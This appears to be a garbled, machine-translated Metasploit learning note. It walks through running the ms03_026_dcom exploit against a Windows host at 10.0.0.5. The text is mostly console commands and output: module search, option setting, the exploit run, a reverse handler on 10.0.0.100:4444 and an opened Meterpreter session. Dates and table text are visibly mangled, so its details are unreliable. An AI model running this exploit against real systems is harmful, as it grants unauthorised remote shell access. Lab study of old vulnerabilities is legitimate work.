Fool-style use ms03_026_dcom:
Matching Modules================Name Disclosure Date Rank Description---- --------------- ---- -----------Auxiliary/scanner/telnet/telnet_ruggedcom normal ruggedcom telnet Password generatorexploit/windows/dcerpc/ms03_026_dcom2003- -- -Great ms03-026Microsoft RPC DCOM Interface overflowexploit/windows/smb/ms04_031_netdde2004-Ten- AGood ms04-031Microsoft NetDDE Service overflowexploit/windows/smb/psexec_psh1999- on- onmanual Microsoft Windows authenticated Powershell Command executionmsf> Use exploit/windows/dcerpc/ms03_026_dcom//Setting Vulnerability code MSF exploit (ms03_026_dcom)>Show Optionsmodule options (Exploit/windows/dcerpc/ms03_026_dcom): Name current Setting Required Description---- --------------- -------- -----------RHOST Yes the target addressrport135Yes the target portexploit target:id Name-- ----0Windows NT sp3-6a/ -/xp/2003universalmsf Exploit (ms03_026_dcom)>SetRHOST10.0.0.5RHOST=10.0.0.5MSF exploit (ms03_026_dcom)>exploit[*] Started Reverse Handler on10.0.0.100:4444 [*] Trying target Windows NT sp3-6a/ -/xp/2003Universal ... [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.0.0.5[135] ... [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.0.0.5[135] ... [*] Sending exploit ... [*] Sending stage (770048bytes) to10.0.0.5[*] Meterpreter session1Opened (10.0.0.100:4444-10.0.0.5:1231) at --Geneva- - -: ,: -+0800Meterpreter>//Success!
The ms03_026 of Metasploit learning